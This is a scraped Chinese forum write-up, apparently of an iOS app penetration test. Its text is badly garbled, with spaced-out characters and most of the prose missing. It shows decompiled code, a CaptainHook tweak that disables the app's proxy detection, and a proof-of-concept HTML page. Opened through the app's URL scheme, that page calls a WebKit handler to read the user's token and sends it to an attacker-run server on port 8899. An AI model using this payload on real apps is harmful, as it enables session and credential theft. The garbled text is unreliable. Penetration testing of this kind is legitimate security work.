[27974] 2019-12-22_一次iOSApp渗透测试

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-19
2019-12-22_一次iOSApp渗透测试 i O S   A p p O t s   2 0 1 9 - 1 2 - 2 2 i O S   A p p i O S A p p b u r p A p p A p p i p a i D A F u n c t i o n s   w i n d o w " p r o x y " g e t P r o x y S t a t u s G o o g l e i O S g e t P r o x y S t a t u s C F N e t w o r k C o p y S y s t e m P r o x y S e t t i n g s b o o l   _ _ c d e c l   - [ X X X X M a n a g e r   g e t P r o x y S t a t u s ] ( S P B l l H T T P C l i e n t M a n a g e r   * s e l f ,   S E L   a 2 ) {     v 2   =   C F N e t w o r k C o p y S y s t e m P r o x y S e t t i n g s ( ) ;     . . .     r e t u r n   v 1 9   ^   1 ; } H o o k g e t P r o x y S t a t u s C F N e t w o r k C o p y S y s t e m P r o x y S e t t i n g s ( ) N O A p p D u m p 使 f r i d a - i o s - d u m p d u m p i p a x C o d e m o n k e y D e v 退 i O S   A p p x C o d e M a c O S x C o d e * * - [ N S F i l e M a n a g e r   c o p y I t e m A t P a t h : t o P a t h : o p t i o n s : e r r o r : ] :   d e s t i n a t i o n   p a t h   i s   n i l ' * * F u n c t i o n s   w i n d o w c o p y I t e m A t P a t h S t r i n g s
b o o l   _ _ c d e c l   - [ X X X M a n a g e r   s a v e X X X P a t h : t o F i l e : ] ( X X X M a n a g e r   * s e l f ,   S E L   a 2 ,   i d   a 3 ,   i d   a 4 ) {     . . .     v 1 4   =   o b j c _ m s g S e n d ( & O B J C _ C L A S S _ _ _ N S F i l e M a n a g e r ,   " d e f a u l t M a n a g e r " ) ;     v 1 5   =   ( v o i d   * ) o b j c _ r e t a i n A u t o r e l e a s e d R e t u r n V a l u e ( v 1 4 ) ;     v 1 6   =   o b j c _ m s g S e n d ( v 1 3 ,   " p a t h " ) ;     v 1 7   =   o b j c _ r e t a i n A u t o r e l e a s e d R e t u r n V a l u e ( v 1 6 ) ;     v 1 8   =   ( u n s i g n e d   _ _ i n t 6 4 ) o b j c _ m s g S e n d ( v 1 5 ,   " c o p y I t e m A t P a t h : t o P a t h : e r r o r : " ,   v 6 ,   v 1 7 ,   0 L L ) ;     r e t u r n   v 1 8 ; } 退 h o o k s a v e X X X P a t h 使 g e t P r o x y S t a t u s C H D e c l a r e C l a s s ( X X X M a n a g e r ) C H O p t i m i z e d M e t h o d 2 ( s e l f ,   v o i d ,   X X X M a n a g e r ,   s a v e X X X P a t h ,   N S S t r i n g   * ,   a r g 1 ,   t o F i l e ,   N S S t r i n g   * ,   a r g 2 )   { } C H D e c l a r e C l a s s ( X X X X M a n a g e r ) C H O p t i m i z e d M e t h o d 0 ( s e l f ,   B O O L ,   X X X X M a n a g e r ,   g e t P r o x y S t a t u s ) {         r e t u r n   N O ;         }         C H C o n s t r u c t o r {                 C H L o a d L a t e C l a s s ( X X X M a n a g e r ) ;                 C H C l a s s H o o k 2 ( X X X M a n a g e r ,   s a v e X X X P a t h ,   t o F i l e ) ;         C H L o a d L a t e C l a s s ( X X X X M a n a g e r ) ;         C H C l a s s H o o k 0 ( X X X X M a n a g e r ,   g e t P r o x y S t a t u s ) ;         } - U R L   S c h e m e w e b u r l c o o k i e U R L U R L   S c h e m e S c h e m e u r l U R L
p o c . h t m l a p p w e b P a s s i o n f r u i t a p p   U R L   S c h e m e W e c h a t :   w x 8 0 e 3 2 4 4 4 4 7 c a 1 2 c e : / / Q Q :   Q Q 4 1 e 5 6 4 4 0 : / / t e n c e n t :     t e n c e n t 1 0 1 4 2 8 8 1 5 : / / s i n a :   w b 3 1 7 3 0 6 3 2 1 0 : / / b x t e s t : / / b x t e s t U R L   S c h e m e s c h e m e h o s t b x t e s t a p p s c h e m e u r l a p p l i c a t i o n : o p e n u r l : o p t i o n s + [ R o u t e M e d i a t o r   h a n d l e O p e n U R L : ] U R L   S c h e m e u r l U R L l o g i n S t a t u s U R L v 7 8   =   o b j c _ m s g S e n d ( v 1 2 ,   " o b j e c t F o r K e y : " ,   C F S T R ( " u r l " ) ) ;             v 7 9   =   ( s t r u c t   o b j c _ o b j e c t   * ) o b j c _ r e t a i n A u t o r e l e a s e d R e t u r n V a l u e ( v 7 8 ) ;             v 8 0   =   ( ( i d   ( _ _ c d e c l   * ) ( U s e r C e n t e r _ m e t a   * ,   S E L ) ) o b j c _ m s g S e n d ) (                             ( U s e r C e n t e r _ m e t a   * ) & O B J C _ C L A S S _ _ _ U s e r C e n t e r ,                             " s h a r e U s e r C e n t e r " ) ;             v 8 1   =   ( v o i d   * ) o b j c _ r e t a i n A u t o r e l e a s e d R e t u r n V a l u e ( v 8 0 ) ;             v 8 2   =   v 8 1 ;             v 8 3   =   ( u n s i g n e d   _ _ i n t 6 4 ) o b j c _ m s g S e n d ( v 8 1 ,   " i s L o g i n " ) ;             v 8 4   =   ( ( i d   ( _ _ c d e c l   * ) ( R o u t e M e d i a t o r _ m e t a   * ,   S E L ,   i d ,   i d ,   b o o l ) ) o b j c _ m s g S e n d ) (                             ( R o u t e M e d i a t o r _ m e t a   * ) & O B J C _ C L A S S _ _ _ R o u t e M e d i a t o r ,                             " g e t P r o c e s s e d F i n a l U r l : p a r a m s : l o g i n S t a t u s : " ,                             v 7 9 ,                             v 1 2 ,                             v 8 3 ) ;             v 8 5   =   ( v o i d   * ) o b j c _ r e t a i n A u t o r e l e a s e d R e t u r n V a l u e ( v 8 4 ) ;             o b j c _ r e l e a s e ( v 8 2 ) ;             o b j c _ r e l e a s e ( v 7 9 ) ;             v 8 6   =   o b j c _ m s g S e n d ( v 8 5 ,   " s t r i n g B y R e p l a c i n g P e r c e n t E s c a p e s U s i n g E n c o d i n g : " ,   4 L L ) ;             v 5 5   =   o b j c _ r e t a i n A u t o r e l e a s e d R e t u r n V a l u e ( v 8 6 ) ; u r l s c h e m e b x t e s t : / / w e b ? t a r g e t = w e b & u r l = x x x p o c . h t m l p y t h o n   - m   S i m p l e H T T P S e r v e r   8 8 9 9
< h t m l > < h e a d >     < s c r i p t   t y p e = " t e x t / j a v a s c r i p t " >         w i n d o w . s u c c e s s   =   m s g   = > {             x m l H t t p   =   n e w   X M L H t t p R e q u e s t ( ) ;             x m l H t t p . o p e n ( ' G E T ' ,   ' h t t p : / / i p : 8 8 9 9 / '   +   m s g ,   t r u e ) ;             x m l H t t p . s e n d ( )         }         w i n d o w . w e b k i t . m e s s a g e H a n d l e r s . e x e c u t e . p o s t M e s s a g e ( [ ' U s e r I n f o ' ,   ' g e t T o k e n ' ,   ' ' ,   ' s u c c e s s ' ,   ' f a i l u r e ' ] ) ;     < / s c r i p t >     < / h e a d >     < b o d y >         < p > t e s t < / p >     < / b o d y > < / h t m l > S a f a r i b x t e s t : / / w e b ? t a r g e t = w e b & u r l = x x x / p o c . h t m l A P P 访 p o c . h t m l w e b s e r v e r G E T t o k e n c o o k i e
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则